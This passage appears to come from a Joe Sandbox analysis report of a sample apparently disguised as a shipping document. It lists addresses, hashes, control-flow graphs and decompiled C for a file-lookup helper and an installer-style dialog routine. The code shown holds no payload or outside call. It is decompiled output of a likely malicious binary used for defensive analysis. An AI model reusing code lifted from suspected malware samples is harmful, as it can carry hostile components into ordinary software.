                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x00000000
                                                0x004073da
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00000000
                                                0x0040722f
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040683D(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426758); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426758;
			}




                                                0x00406848
                                                0x00406851
                                                0x00000000
                                                0x0040685e
                                                0x00406854
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(7620FAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                • FindClose.KERNEL32(00000000), ref: 00406854
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: XgB
                                                • API String ID: 2295610775-796949446
                                                • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 197 403f88-403f91 195->197 198 40413b-404150 196->198 199 4040ee-404129 GetDlgItem * 2 call 404463 KiUserCallbackDispatcher call 40140b 196->199 202 403f93-403fa0 SetWindowPos 197->202 203 403fa6-403fad 197->203 200 404190-404195 call 4044af 198->200 201 404152-404155 198->201 226 40412e-404136 199->226 213 40419a-4041b5 200->213 205 404157-404162 call 401389 201->205 206 404188-40418a 201->206 202->203 208 403ff1-403ff7 203->208 209 403faf-403fc9 ShowWindow 203->209 205->206 230 404164-404183 SendMessageW 205->230 206->200 212 404430 206->212 216 404010-404013 208->216 217 403ff9-40400b DestroyWindow 208->217 214 4040ca-4040d8 call 4044ca 209->214 215 403fcf-403fe2 GetWindowLongW 209->215 224 404432-404439 212->224 221 4041b7-4041b9 call 40140b 213->221 222 4041be-4041c4 213->222 214->224 215->214 223 403fe8-403feb ShowWindow 215->223 227 404015-404021 SetWindowLongW 216->227 228 404026-40402c 216->228 225 40440d-404413 217->225 221->222 234 4041ca-4041d5 222->234 235 4043ee-404407 DestroyWindow EndDialog 222->235 223->208 225->212 233 404415-40441b 225->233 226->198 227->224 228->214 229 404032-404041 GetDlgItem 228->229 236 404060-404063 229->236 237 404043-40405a SendMessageW IsWindowEnabled 229->237 230->224 233->212 238 40441d-404426 ShowWindow 233->238 234->235 239 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 234->239 235->225 240 404065-404066 236->240 241 404068-40406b 236->241 237->212 237->236 238->212 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 239->266 267 40422a-40422f 239->267 243 404096-40409b call 40443c 240->243 244 404079-40407e 241->244 245 40406d-404073 241->245 243->214 248 4040b4-4040c4 SendMessageW 244->248 250 404080-404086 244->250 245->248 249 404075-404077 245->249 248->214 249->243 254 404088-40408e call 40140b 250->254 255 40409d-4040a6 call 40140b 250->255 264 404094 254->264 255->214 263 4040a8-4040b2 255->263 263->264 264->243 270 404270-404271 266->270 271 404273 266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->213 286 404303-404305 275->286 286->213 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->212 291 40431d-404323 288->291 289->225 290 404348-404375 CreateDialogParamW 289->290 290->225 292 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->292 291->213 293 404329 291->293 292->212 298 4043d4-4043e7 ShowWindow call 4044af 292->298 293->212 300 4043ec 298->300 300->225
                                                C-Code - Quality: 86%
                                                			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x4236f0 = _t34;
					if(_t130 == 0x110) {
						 *0x42a228 = _t127;
						 *0x423704 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216d0 = _t91;
						E00404463(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
						 *0x4291ec = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x4236f0 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a240;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044AF(0x40b);
						while(1) {
							_t36 =  *0x4236f0;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x42a244;
							if(_t38 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291ec - _t136;
							if( *0x4291ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404463(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ac - _t136;
							_v28 = _t48;
							if( *0x42a2ac != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404485(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x4216d0, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x423704);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x4216d0);
							}
							E00404498();
							E00406507(0x423708, E00403F45());
							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423708); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291f8); // executed
									 *0x4226e0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "\"F@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x4291f8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404463(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x4291ec - _t136;
									if( *0x4291ec != _t136) {
										goto L63;
									}
									ShowWindow( *0x4291f8, 8); // executed
									E004044AF(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x4291f8);
						 *0x42a228 = _t136;
						EndDialog(_t127,  *0x421ed8);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x4291f8, 0x40f, 0, 1);
						__eflags =  *0x4291ec;
						return 0 |  *0x4291ec == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ac - _t136;
											if( *0x42a2ac == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421ed8 = 1;
												L23:
												_push(0x78);
												L24:
												E0040443C();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421ed8 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x4291f8);
						 *0x4291f8 = _t122;
						L60:
						if( *0x425708 == _t136 &&  *0x4291f8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425708 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044CA(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                0x00403f6f
                                                0x00403f76
                                                0x004040dd
                                                0x004040e1
                                                0x004040e5
                                                0x004040e7
                                                0x004040ec
                                                0x004040f7
                                                0x00404102
                                                0x00404107
                                                0x00404109
                                                0x0040410b
                                                0x0040410e
                                                0x00404113
                                                0x00404121
                                                0x0040412e
                                                0x00404135
                                                0x00404135
                                                0x00404136
                                                0x00404136
                                                0x0040413b
                                                0x00404141
                                                0x00404148
                                                0x0040414e
                                                0x00404150
                                                0x00404190
                                                0x00404195
                                                0x0040419a
                                                0x0040419a
                                                0x0040419f
                                                0x004041a8
                                                0x004041aa
                                                0x004041af
                                                0x004041b5
                                                0x004041b9
                                                0x004041b9
                                                0x004041be
                                                0x004041c4
                                                0x00000000
                                                0x00000000
                                                0x004041cf
                                                0x004041d5
                                                0x00000000
                                                0x00000000
                                                0x004041de
                                                0x004041e6
                                                0x004041eb
                                                0x004041ee
                                                0x004041f4
                                                0x004041f9
                                                0x004041fc
                                                0x00404202
                                                0x00404207
                                                0x0040420a
                                                0x00404210
                                                0x00404218
                                                0x0040421e
                                                0x00404224
                                                0x00404228
                                                0x0040422f
                                                0x0040422f
                                                0x0040422f
                                                0x00404239
                                                0x0040424b
                                                0x00404257
                                                0x0040425c
                                                0x00404266
                                                0x0040426c
                                                0x0040426e
                                                0x00404273
                                                0x00404270
                                                0x00404270
                                                0x00404270
                                                0x00404283
                                                0x0040429b
                                                0x0040429d
                                                0x004042a3
                                                0x004042b8
                                                0x004042a5
                                                0x004042ae
                                                0x004042b0
                                                0x004042b0
                                                0x004042be
                                                0x004042cf
                                                0x004042e5
                                                0x004042ec
                                                0x004042f6
                                                0x004042fb
                                                0x004042fd
                                                0x00000000
                                                0x00404303
                                                0x00404303
                                                0x00404305
                                                0x00000000
                                                0x00000000
                                                0x0040430b
                                                0x0040430f
                                                0x00404334
                                                0x0040433a
                                                0x00404340
                                                0x00404342
                                                0x00000000
                                                0x00000000
                                                0x00404368
                                                0x0040436e
                                                0x00404370
                                                0x00404375
                                                0x00000000
                                                0x00000000
                                                0x0040437b
                                                0x0040437e
                                                0x00404381
                                                0x00404398
                                                0x004043a4
                                                0x004043bd
                                                0x004043c7
                                                0x004043cc
                                                0x004043d2
                                                0x00000000
                                                0x00000000
                                                0x004043dc
                                                0x004043e7
                                                0x00000000
                                                0x004043e7
                                                0x00404311
                                                0x00404317
                                                0x00000000
                                                0x00000000
                                                0x0040431d
                                                0x00404323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404329
                                                0x004042fd
                                                0x004043f4
                                                0x00404400
                                                0x00404407
                                                0x00000000
                                                0x00404152
                                                0x00404152
                                                0x00404155
                                                0x00404188
                                                0x00404188
                                                0x0040418a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040418a
                                                0x0040415b
                                                0x00404160
                                                0x00404162
                                                0x00000000
                                                0x00000000
                                                0x00404172
                                                0x0040417a
                                                0x00000000
                                                0x00404180
                                                0x00403f88
                                                0x00403f88
                                                0x00403f8c
                                                0x00403f91
                                                0x00403fa0
                                                0x00403fa0
                                                0x00403fa6
                                                0x00403fad
                                                0x00403ff1
                                                0x00403ff7
                                                0x00404010
                                                0x00404013
                                                0x00404026
                                                0x0040402c
                                                0x00000000
                                                0x00000000
                                                0x00404032
                                                0x0040403d
                                                0x0040403f
                                                0x00404041
                                                0x00404060
                                                0x00404060
                                                0x00404063
                                                0x00404068
                                                0x0040406b
                                                0x0040407b
                                                0x0040407c
                                                0x0040407e
                                                0x004040b4
                                                0x004040c4
                                                0x00000000
                                                0x004040c4
                                                0x00404080
                                                0x00404086
                                                0x0040409f
                                                0x004040a4
                                                0x004040a6
                                                0x00000000
                                                0x00000000
                                                0x004040a8
                                                0x00404094
                                                0x00404094
                                                0x00404096
                                                0x00404096
                                                0x00000000
                                                0x00404096
                                                0x00404089
                                                0x0040408e
                                                0x00000000
                                                0x0040408e
                                                0x0040406d
                                                0x00404073
                                                0x00000000
                                                0x00000000
                                                0x00404075
                                                0x00000000
                                                0x00404075
                                                0x00404065
                                                0x00000000
                                                0x00404065
                                                0x0040404b
                                                0x00404052
                                                0x00404058
                                                0x0040405a
                                                0x00404430
                                                0x00000000
                                                0x00404430
                                                0x00000000
                                                0x0040405a
                                                0x00404018
                                                0x00000000
                                                0x00404020
                                                0x00403fff
                                                0x00404005
                                                0x0040440d
                                                0x00404413
                                                0x00404420
                                                0x00404426
                                                0x00404426
                                                0x00000000
                                                0x00403faf
                                                0x00403fb4
                                                0x00403fc0
                                                0x00403fc9
                                                0x004040ca
                                                0x00000000
                                                0x00403fe8
                                                0x00403feb
                                                0x00000000
                                                0x00403feb
                                                0x00403fc9
                                                0x00403fad

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                • ShowWindow.USER32(?), ref: 00403FC0
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                • DestroyWindow.USER32 ref: 00403FFF
                                                • SetWindowLongW.USER32 ref: 00404018
                                                • GetDlgItem.USER32 ref: 00404037
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                • GetDlgItem.USER32 ref: 004040FD
                                                • GetDlgItem.USER32 ref: 00404107
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                • GetDlgItem.USER32 ref: 00404218
                                                • ShowWindow.USER32(00000000,?), ref: 00404239
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                • EnableWindow.USER32(?,?), ref: 00404266
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                • EnableMenuItem.USER32 ref: 00404283
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 3618520773-0
                                                • Opcode ID: 3c9ae7d6275b35c3fda3dee6dbafb97324a8be4c9a106d3b0ef57b82a36e873a
                                                • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                • Opcode Fuzzy Hash: 3c9ae7d6275b35c3fda3dee6dbafb97324a8be4c9a106d3b0ef57b82a36e873a
                                                • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403BB6 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
